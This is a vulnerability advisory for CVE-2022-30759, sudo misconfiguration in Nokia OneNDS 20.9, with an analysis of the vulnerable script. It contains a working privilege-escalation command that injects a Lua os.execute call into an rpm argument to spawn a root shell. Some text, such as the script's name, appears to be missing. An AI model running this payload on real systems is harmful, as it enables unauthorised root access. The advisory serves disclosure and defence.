Authored by Giacomo Sighinolfi

Nokia OneNDS 20.9 has loose sudo permissions that can allow users to escalate privileges.

advisories | CVE-2022-30759

title: Incorrect Permission Assignment
product: Nokia OneNDS 20.9
vulnerability type: Security Misconfiguration
severity: High
CVSS Score: 7.8
found on: 04/05/2022
by: Giacomo Sighinolfi <[email protected]>
cve: CVE-2022-30759

Some sudo permissions can be exploited by some users to escalate to root
privileges and execute arbitrary commands on the system.

The affected users are:
Provgw, notifs, dbmrun, (system users)
They can run as root the following script:
It can be exploited with:
sudo /opt/cntdb/bin/ force-erase
"--eval '%{lua:os.execute("/bin/sh")}'"


Detailed analysis:

The script accept as first argument one of the these options:
and as a second argument an arbitrary rpm package name.

If we analyze the switch case code block (row 175) we can see how the first
argument influence the execution of the script.
175. case "$1" in

224. test-erase)
225. TEST_OPTION="--test"
226. OPTION="-e"
227. ;;

238. force-erase)
239. TEST_OPTION="--nodeps"
240. OPTION="-e"
241. ;;

Using “force-erase” or “test-erase” as the first argument, it creates “OPTION”
variable with “-e” as its value. That value allow us to trigger a privilege
escalation exploiting the rpm command (row 254) with a particular rpm package
name as second parameter passed to the script.

252. if [ $OPTION == "-e" ]
253. then
254. rpm $OPTION --noscripts $TEST_OPTION $2